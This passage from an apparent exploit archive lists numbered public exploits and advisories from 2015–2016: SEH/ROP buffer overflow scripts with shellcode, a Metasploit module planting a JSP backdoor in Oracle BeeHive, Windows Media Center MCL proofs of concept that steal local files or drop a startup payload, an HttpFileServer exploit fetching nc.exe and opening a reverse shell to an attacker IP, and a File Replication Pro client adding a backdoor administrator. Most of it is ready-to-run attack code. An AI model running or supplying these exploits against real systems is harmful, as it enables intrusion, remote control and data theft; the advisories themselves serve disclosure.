EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll] 0x1001b4f6, # POP ECX # RETN [ImageLoad.dll] 0x61c73281, # &Writable location [sqlite3.dll] 0x100194b3, # POP EDI # RETN [ImageLoad.dll] 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] 0x10015442, # POP EAX # RETN [ImageLoad.dll] 0x90909090, # nop 0x100240c2, # PUSHAD # RETN [ImageLoad.dll] ] return ''.join(struct.pack('<I', _) for _ in rop_gadgets) # Check command line args if len(sys.argv) <= 1: print "Usage: python poc.py [host] [port]" exit() host = sys.argv[1] port = int(sys.argv[2]) # Offsets rop_offset = 2455 max_size = 5000 seh_offset = 4059 eax_offset = 4183 # move ESP out of the way so the shellcode doesn't corrupt itself during execution # metasm > add esp,-1500 shellcode = "\x81\xc4\x24\xfa\xff\xff" # Just as a PoC, spawn calc.exe. Replace with any other shellcode you want # (maximum size of shellcode allowed: 1260 bytes) # # msfvenom -p windows/exec CMD=calc.exe -b '\x00\x3b' -f python # Payload size: 220 bytes shellcode += "\xbb\xde\x37\x73\xe9\xdb\xdf\xd9\x74\x24\xf4\x58\x31" shellcode += "\xc9\xb1\x31\x31\x58\x13\x83\xe8\xfc\x03\x58\xd1\xd5" shellcode += "\x86\x15\x05\x9b\x69\xe6\xd5\xfc\xe0\x03\xe4\x3c\x96" shellcode += "\x40\x56\x8d\xdc\x05\x5a\x66\xb0\xbd\xe9\x0a\x1d\xb1" shellcode += "\x5a\xa0\x7b\xfc\x5b\x99\xb8\x9f\xdf\xe0\xec\x7f\xde" shellcode += "\x2a\xe1\x7e\x27\x56\x08\xd2\xf0\x1c\xbf\xc3\x75\x68" shellcode += "\x7c\x6f\xc5\x7c\x04\x8c\x9d\x7f\x25\x03\x96\xd9\xe5" shellcode += "\xa5\x7b\x52\xac\xbd\x98\x5f\x66\x35\x6a\x2b\x79\x9f" shellcode += "\xa3\xd4\xd6\xde\x0c\x27\x26\x26\xaa\xd8\x5d\x5e\xc9" shellcode += "\x65\x66\xa5\xb0\xb1\xe3\x3e\x12\x31\x53\x9b\xa3\x96" shellcode += "\x02\x68\xaf\x53\x40\x36\xb3\x62\x85\x4c\xcf\xef\x28" shellcode += "\x83\x46\xab\x0e\x07\x03\x6f\x2e\x1e\xe9\xde\x4f\x40" shellcode += "\x52\xbe\xf5\x0a\x7e\xab\x87\x50\x14\x2a\x15\xef\x5a" shellcode += "\x2c\x25\xf0\xca\x45\x14\x7b\x85\x12\xa9\xae\xe2\xed" shellcode += "\xe3\xf3\x42\x66\xaa\x61\xd7\xeb\x4d\x5c\x1b\x12\xce" shellcode += "\x55\xe3\xe1\xce\x1f\xe6\xae\x48\xf3\x9a\xbf\x3c\xf3" shellcode += "\x09\xbf\x14\x90\xcc\x53\xf4\x79\x6b\xd4\x9f\x85" buffer = "A" * rop_offset # padding buffer += create_rop_chain() buffer += shellcode buffer += "A" * (seh_offset - len(buffer)) # padding buffer += "BBBB" # overwrite nSEH pointer buffer += struct.pack("<I", 0x1002280a) # overwrite SEH record with stack pivot (ADD ESP,1004 # RETN [ImageLoad.dll]) buffer += "A" * (eax_offset - len(buffer)) # padding buffer += struct.pack("<I", 0xffffffff) # overwrite EAX to always trigger an exception buffer += "A" * (max_size - len(buffer)) # padding httpreq = ( "GET /changeuser.ghp HTTP/1.1\r\n" "User-Agent: Mozilla/4.0\r\n" "Host:" + host + ":" + str(port) + "\r\n" "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" "Accept-Language: en-us\r\n" "Accept-Encoding: gzip, deflate\r\n" "Referer: http://" + host + "/\r\n" "Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n" "Conection: Keep-Alive\r\n\r\n" ) # Send payload to the server s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(httpreq) s.close()
  19. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info={}) super(update_info(info, 'Name' => "Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload", 'Description' => %q{ This module exploits a vulnerability found in Oracle BeeHive. The prepareAudioToPlay method found in voice-servlet can be abused to write a malicious file onto the target machine, and gain remote arbitrary code execution under the context of SYSTEM. Authentication is not required to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'mr_me <steventhomasseeley[at]gmail.com>', # Source Incite. Vulnerability discovery, PoC 'sinn3r' # MSF module ], 'References' => [ [ 'ZDI', '15-550'], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html' ] ], 'DefaultOptions' => { 'RPORT' => 7777 }, 'Platform' => 'win', 'Targets' => [ ['Oracle Beehive 2', {}] ], 'Privileged' => true, 'DisclosureDate' => "Nov 10 2015", 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [ true, "Oracle Beehive's base directory", '/']) ], self.class) end def check res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa/')) if res.nil? vprint_error("Connection timed out.") return Exploit::CheckCode::Unknown elsif res && (res.code == 403 || res.code == 200) return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def exploit unless check == Exploit::CheckCode::Detected fail_with(Failure::NotVulnerable, 'Target does not have voice-servlet') end # Init some names # We will upload to: # C:\oracle\product\2.0.1.0.0\beehive_2\j2ee\BEEAPP\applications\voice-servlet\prompt-qa\ exe_name = "#{Rex::Text.rand_text_alpha(5)}.exe" stager_name = "#{Rex::Text.rand_text_alpha(5)}.jsp" print_status("Stager name is: #{stager_name}") print_status("Executable name is: #{exe_name}") register_files_for_cleanup("../BEEAPP/applications/voice-servlet/voice-servlet/prompt-qa/#{stager_name}") # Ok fire! print_status("Uploading stager...") res = upload_stager(stager_name, exe_name) # Hmm if we fail to upload the stager, no point to continue. unless res fail_with(Failure::Unknown, 'Connection timed out.') end print_status("Uploading payload...") upload_payload(stager_name) end # Our stager is basically a backdoor that allows us to upload an executable with a POST request. def get_jsp_stager(exe_name) jsp = %Q|<%@ page import="java.io.*" %> <% ByteArrayOutputStream buf = new ByteArrayOutputStream(); BufferedReader reader = request.getReader(); int tmp; while ((tmp = reader.read()) != -1) { buf.write(tmp); } FileOutputStream fostream = new FileOutputStream("#{exe_name}"); buf.writeTo(fostream); fostream.close(); Runtime.getRuntime().exec("#{exe_name}"); %>| # Since we're sending it as a GET request, we want to keep it smaller so # we gsub stuff we don't want. jsp.gsub!("\n", '') jsp.gsub!(' ', ' ') Rex::Text.uri_encode(jsp) end def upload_stager(stager_name, exe_name) # wavfile = Has to be longer than 4 bytes (otherwise you hit a java bug) jsp_stager = get_jsp_stager(exe_name) uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', 'playAudioFile.jsp') send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'encode_params' => false, # Don't encode %00 for us 'vars_post' => { 'sess' => "..\\#{stager_name}%00", 'recxml' => jsp_stager, 'audiopath' => Rex::Text.rand_text_alpha(1), 'wavfile' => "#{Rex::Text.rand_text_alpha(5)}.wav", 'evaluation' => Rex::Text.rand_text_alpha(1) } }) end def upload_payload(stager_name) uri = normalize_uri(target_uri.path, 'voice-servlet', 'prompt-qa', stager_name) send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'data' => generate_payload_exe(code: payload.encoded) }) end def print_status(msg) super("#{rhost}:#{rport} - #{msg}") end end
  20. 1. Advisory Information Title: Microsoft Windows Media Center link file incorrectly resolved reference Advisory ID: CORE-2015-0014 Advisory URL: http://www.coresecurity.com/advisories/microsoft-windows-media-center-link-file-incorrectly-resolved-reference Date published: 2015-12-08 Date of last update: 2015-12-04 Vendors contacted: Microsoft Release mode: Coordinated release 2. Vulnerability Information Class: Use of Incorrectly-Resolved Name or Reference [CWE-706] Impact: Information leak Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2015-6127 3. Vulnerability Description The 'application' tag in Microsoft [1] Windows Media Center link files (.mcl extension) can include a 'run' parameter, which indicates the path of a file to be launched when opening the MCL file, or a 'url' parameter, which indicates the URL of a web page to be loaded within the Media Center's embedded web browser. A specially crafted MCL file having said 'url' parameter pointing to the MCL file itself can trick Windows Media Center into rendering the very same MCL file as a local HTML file within the Media Center's embedded web browser. 4. Vulnerable Packages Windows 7 for x64-based Systems Service Pack 1 (with Internet Explorer 11 installed) Other versions are probably affected too, but they were not checked. 5. Vendor Information, Solutions and Workarounds Microsoft posted the following Security Bulletin: MS15-134 [2] 6. Credits This vulnerability was discovered and researched by Francisco Falcon from Core Exploits Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from the Core Advisories Team. 7. Technical Description / Proof of Concept Code The ehexthost.exe binary, part of Windows Media Center, loads the given URL into an embedded instance of Internet Explorer running in the local machine zone, but it doesn't opt-in for the FEATURE_LOCALMACHINE_LOCKDOWN IE security feature, therefore this situation can be leveraged by an attacker to read and exfiltrate arbitrary files from a victim's local filesystem by convincing him to open a malicious MCL file. The proof-of-concept shows an MCL file with embedded HTML + JS code, referencing itself in the 'url' parameter. Unlike what happens when loading a local HTML file into Internet Explorer 11, the JS code included here will automatically run with no prompts, and it will be able to read arbitrary local files using the MSXML2.XMLHTTP ActiveX object. Those read files then can be uploaded to an arbitrary remote web server. Also note that, in order for the PoC to work, the value of the 'url' parameter must match the name of the MCL file. 7.1. Proof of Concept A new file should be created with the name "poc-microsoft.mcl" and with the following content: <application url="poc-microsoft.mcl" name="Showcase" bgcolor="RGB(255,255,255)" sharedviewport="false"> <html> <head> <meta http-equiv="x-ua-compatible" content="IE=edge" > </head> <body> <script type="text/javascript"> function do_upload(fname, data){ var xmlhttp = new XMLHttpRequest(); xmlhttp.open("POST", "http://192.168.1.50/uploadfile.php", true); xmlhttp.setRequestHeader("Content-type", "multipart/form-data"); xmlhttp.setRequestHeader("Connection", "close"); xmlhttp.onreadystatechange = function(){if (xmlhttp.readyState == 4){alert(fname + " done.");}} xmlhttp.send(new Uint8Array(data)); } function read_local_file(filename){ /* Must use this one, XMLHttpRequest() doesn't allow to read local files */ var xmlhttp = new ActiveXObject("MSXML2.XMLHTTP"); xmlhttp.open("GET", filename, false); xmlhttp.send(); return xmlhttp.responseBody.toArray(); } function upload_file(filename){ try{ do_upload(filename, read_local_file(filename)); }catch(e){ alert(filename + " error: " + e); } } upload_file("file:///C:/Windows/System32/calc.exe"); </script> </body> </html> </application> 8. Report Timeline 2015-09-24: Core Security sent the first notification to Microsoft. 2015-09-24: Microsoft acknowledged receipt of the email and requested a draft version of the advisory. 2015-09-25: Core Security sent Microsoft the draft version of the advisory including a PoC. 2015-09-25: Microsoft cased the report under MSRC 31305. 2015-10-02: Core Security requested Microsoft provide a status update and confirmation of the reported bug. 2015-10-02: Microsoft informed Core Security that they were able to reproduce the issue. They were still reviewing it to determine if they would address it in a security release. 2015-10-07: Core Security requested Microsoft let us know once they made a decision. 2015-10-08: Microsoft informed Core Security they would keep us updated. 2015-10-26: Core Security asked Microsoft if there were any updates regarding the reported bug and if they had an estimated time of availability. 2015-10-27: Microsoft informed Core Security that they would be pursuing a fix for the reported issue and are working on a release date for it. 2015-11-05: Core Security asked Microsoft if they had determined a release date for the fix and a CVE ID to the reported vulnerability. 2015-11-10: Microsoft informed Core Security that they were targeting the security fix for this issue in their December release. They also informed us that they assigned CVE-2015-6127 to this case. 2015-11-11: Core Security thanked Microsoft for their reply and clarified that we would be publishing the advisory on Tuesday, the 8 of December, 2015. 2015-11-12: Microsoft requested from Core Security the link where the advisory would be published and the name of the researcher that should appear in the acknowledgment. 2015-11-13: Core Security informed Microsoft of the link and name that should appear in the acknowledgment. 2015-11-16: Microsoft informed Core Security that they updated the CVE acknowledgment accordingly. 2015-12-08: Advisory CORE-2015-0014 published. 9. References [1] http://www.microsoft.com/. [2] https://technet.microsoft.com/library/security/MS15-134. 10. About CoreLabs CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. About Core Security Core Security enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. Disclaimer The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. PGP/GPG Keys This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
  21. Title: Microsoft Windows Media Center Library Parsing RCE Vuln aka "self-executing" MCL file (CVE-2015-6131) Software Vendor: Microsoft Software version : MS Windows Media Center latest version on any Windows OS. Software Vendor Homepage: http://www.microsoft.com CVE: CVE-2015-6131 Exploit Author: Eduardo Braun Prado Vulnerability oficial discoverer: Zhang YunHai of NSFOCUS Security Team date: december 8, 2015 Vulnerability description: Windows Media Center contains a remote code execution vulnerability because it allows "MCL" files to reference themselves as HTML pages, which will be parsed inside Windows Media Center window, in the context of the local machine security zone of Internet Explorer browser. This in turn allows execution of arbitrary code using eg. ADO ActiveX Objects. AKA "self-executing" MCL files. exploit code below: ----------- self-exec-1.mcl ------------------------------------ <application url="self-exec1.mcl"/><html><script>alert(' I am running in local machine zone which allows arbitrary code execution via, for example, ADO Objects')</script></html> ------------------------------------------------------------ ----------self-exec-2.mcl-------------------------------------- <application url="self-exec2.mcl"/><html><b>Use a sniffer software to sniff SMB traffic and retrieve the remote Windows username required for this exploit</b><img src=\\192.168.10.10\smbshare\someimg.jpg></img><script> RecordsetURL='http://192.168.10.10:80/recordsetfile.txt'; var rs = new ActiveXObject('ADODB.recordset'); rs.Open(RecordsetURL); rs.Save('C:/users/windowsuser/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/poc.hta'); rs.Close(); </script></html> ---------------------------------------------------------- -----Create-recordsetfile.hta -------------- <html><body onload="aa()"> <script language="VBScript"> function aa() defdir="." alert "This script will retrieve data from ""recordsetdata.txt"" and save it to the current directory as ""recordsetfile.txt"". Set c = CreateObject("ADODB.Connection") co = "Driver={Microsoft Text Driver (*.txt; *.csv)};DefaultDir=" & defdir & ";Extensions=txt;" c.Open co set rs =CreateObject("ADODB.Recordset") rs.Open "SELECT * from recordsetdata.txt", c al=rs.Save(defdir & "\recordsetfile.txt") rs.close end function </script></body></html> ------------------------------------------------------------------------------- ---------recordsetdata.txt------------------------------------------ <html> <script>a=new ActiveXObject('Wscript.Shell')</script> <script>a.Run('calc.exe',1);</script> </html> -------------------------------------------------------------------
  22. # Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow # Date: 12/2/2015 # Exploit Author: ArminCyber # Contact: [email protected] # Version: 7.2 # Tested on: XP SP3 EN # category: Remote Exploit # Usage: ./exploit.py ip port import socket import sys host = str(sys.argv[1]) port = int(sys.argv[2]) a = socket.socket() print "Connecting to: " + host + ":" + str(port) a.connect((host,port)) entire=4500 # Junk buff = "A"*4061 # Next SEH buff+= "\xeb\x0A\x90\x90" # pop pop ret buff+= "\x98\x97\x01\x10" buff+= "\x90"*19 # calc.exe # Bad Characters: \x20 \x2f \x5c shellcode = ( "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" "\x1c\x39\xbd" ) buff+= shellcode buff+= "\x90"*7 buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20) # HEAD a.send("HEAD " + buff + " HTTP/1.0\r\n\r\n") a.close() print "Done..."
  23. # Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow # Date: 12/2/2015 # Exploit Author: ArminCyber # Contact: [email protected] # Version: 7.2 # Tested on: XP SP3 EN # category: Remote Exploit # Usage: ./exploit.py ip port import socket import sys host = str(sys.argv[1]) port = int(sys.argv[2]) a = socket.socket() print "Connecting to: " + host + ":" + str(port) a.connect((host,port)) entire=4500 # Junk buff = "A"*4061 # Next SEH buff+= "\xeb\x0A\x90\x90" # pop pop ret buff+= "\x98\x97\x01\x10" buff+= "\x90"*19 # calc.exe # Bad Characters: \x20 \x2f \x5c shellcode = ( "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" "\x1c\x39\xbd" ) buff+= shellcode buff+= "\x90"*7 buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20) # GET a.send("GET " + buff + " HTTP/1.0\r\n\r\n") a.close() print "Done..."
  24. #!/usr/bin/python # Exploit Title: HttpFileServer 2.3.x Remote Command Execution # Google Dork: intext:"httpfileserver 2.3" # Date: 04-01-2016 # Remote: Yes # Exploit Author: Avinash Kumar Thapa aka "-Acid" # Vendor Homepage: http://rejetto.com/ # Software Link: http://sourceforge.net/projects/hfs/ # Version: 2.3.x # Tested on: Windows Server 2008 , Windows 8, Windows 7 # CVE : CVE-2014-6287 # Description: You can use HFS (HTTP File Server) to send and receive files. # It's different from classic file sharing because it uses web technology to be more compatible with today's Internet. # It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. #Usage : python Exploit.py <Target IP address> <Target Port Number> #EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). # You may need to run it multiple times for success! import urllib2 import sys try: def script_create(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}") def execute_script(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}") def nc_run(): urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}") ip_addr = "192.168.44.128" #local IP address local_port = "443" # Local Port number vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with" save= "save|" + vbs vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs" exe= "exec|"+vbs2 vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port exe1= "exec|"+vbs3 script_create() execute_script() nc_run() except: print """[.]Something went wrong..! Usage is :[.] python exploit.py <Target IP address> <Target Port Number> Don't forgot to change the Local IP address and Port number on the script"""
  25. Hacking

    Vantage Point Security Advisory 2016-001 ================================ Title: File Replication Pro Remote Command Execution Vendor: File Replication Pro Vendor URL: http://www.filereplicationpro.com/ Versions affected: =< 7.2.0 Severity: High Vendor notified: Yes Reported: 29 October 2015 Public release: 10 February 2016 Author: Jerold Hoong and the VP team <jerold[at]vantagepoint[dot]sg> Permalink: Summary: -------- File Replication Pro (FRP) is a file management solution that is used to back up and copy files from various nodes in the network. Vantage Point has discovered multiple vulnerabilities in FRP v7.2.0 (and possibly prior versions) that allow a remote unauthenticated malicious run arbitrary code with SYSTEM privileges. The vulnerabilities that were discovered are: - Unauthenticated Remote Command Execution - Unauthenticated Remote Arbitrary File Disclosure - Unauthenticated Directory Traversal and File Listing 1. Unauthenticated Remote Command Execution ------------------------------------------- The backup agents implements a RPC service port 9200 that supports various calls, including a function called "ExecCommand" that unsurprisingly executes shell commands on the system. A password hash is used to authenticate calls on this interface (note that the hash itself and not the password is used for authentication). This hash can be obtained from the remote file disclosure vulnerability present in the software (listed below) and used to authenticate to the RPC service, where subsequently, arbitrary commands are executed as the SYSTEM user. POC Exploit Code of Malicious RPC Client: /** * @author Jerold Hoong (Vantage Point Security) * File Replication Pro =< v7.2.0 * Remote Command Execution PoC Working Exploit * www.vantagepoint.sg * NOTE: Include FRP libraries to compile */ import java.io.IOException; import java.util.HashMap; import java.util.Map; import net.diasoft.frp.engine.exception.RPCException; import net.diasoft.frp.engine.model.AddressPort; import net.diasoft.frp.engine.tcp.client.RPCDriver; import net.diasoft.frp.engine.tcp.client.TCPConnection; public class Main { static String ip = "1.2.3.4"; static int port = 9200; // password string can be retrieved from remote file disclosure vulnerability (configuration.xml) // If no password is set, input blank string for password // Use IE to navigate to <Target IP>:9200. OK = NO-AUTH, Error = AUTH static String password = ""; // password 12345 jLIjfQZ5yojbZGTqxg2pY0VROWQ= public static void main(String[] args) { AddressPort ap = new AddressPort(ip, port); AddressPort addresses[] = {ap}; TCPConnection _tcp_connection = null; try { _tcp_connection = new TCPConnection(addresses, password, true); } catch (Exception e) { e.printStackTrace(); } System.out.print("Connecting to host..."); RPCDriver rpc = new RPCDriver(_tcp_connection); HashMap p = new HashMap(); try { Map r = rpc.callFunction("ExecCommand", p); System.out.print("Success!\n"); } catch (RPCException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } catch (ClassNotFoundException e) { e.printStackTrace(); } // add new user System.out.print("Attempting to add user 'vantagepoint' with password 'LOLrofl1337!': "); p.put("COMMAND", "net user vantagepoint LOLrofl1337! /add"); try { Map r = rpc.callFunction("ExecCommand", p); } catch (RPCException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } catch (ClassNotFoundException e) { e.printStackTrace(); } // add new user to Admin group System.out.print("Attempting to add user 'vantagepoint' to 'Administrators' group: "); p.put("COMMAND", "net localgroup \"Administrators\" vantagepoint /add"); try { Map r = rpc.callFunction("ExecCommand", p); } catch (RPCException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } catch (ClassNotFoundException e) { e.printStackTrace(); } //add new user to RDP group System.out.print("Attempting to add user 'vantagepoint' to 'Remote Desktop Users' group:"); p.put("COMMAND", "net localgroup \"Remote Desktop Users\" vantagepoint /add"); try { Map r = rpc.callFunction("ExecCommand", p); } catch (RPCException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } catch (ClassNotFoundException e) { e.printStackTrace(); } System.out.print("\n\n---- END ----\n\n"); } } 2. Unauthenticated Remote Arbitrary File Disclosure --------------------------------------------------- A flaw in File Replication Pro allows a malicious user to gain access to the contents of any file on the remote server. This leads to the compromise of sensitive information such as user accounts and password hashes, which can then be used to further exploit the server using other vulnerabilities in the software. An example of how to view File Replication Pro's web interface user accounts and credentials is shown below by accessing the following URLs: - http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\properties.xml - http://1.2.3.4:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml 3. Unauthenticated Directory Traversal and File Listing ------------------------------------------------------- It was possible to anonymously view the file directory structure of the remote File Replication Pro management server as well as the file directory structure of all server nodes that are managed by the management server. The parameters that are used to construct the POST request in the example code below can be obtained via the remote file disclosure vulnerability by accessing File Replication Pro's configuration.xml, properties.xml and .frp_id files. POST /GetRemoteDirList.jsp?server_name=WIN7SP1&server_key=WIN7SP1~29d919a3:150c736b708:-8000&server_role=Source&server_password=&parent_dir=../../../c:/ HTTP/1.1 Host: 127.0.0.1:9100 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1:9100/AddEditJob.do?action=new Cookie: show_greeting=value; JSESSIONID=81cgjqf795cai Connection: keep-alive Pragma: no-cache Cache-Control: no-cache Content-Length: 0 Fix Information: ---------------- Upgrade to the latest version of File Replication Pro 7.3.0 Timeline: --------- 28 October 2015 - 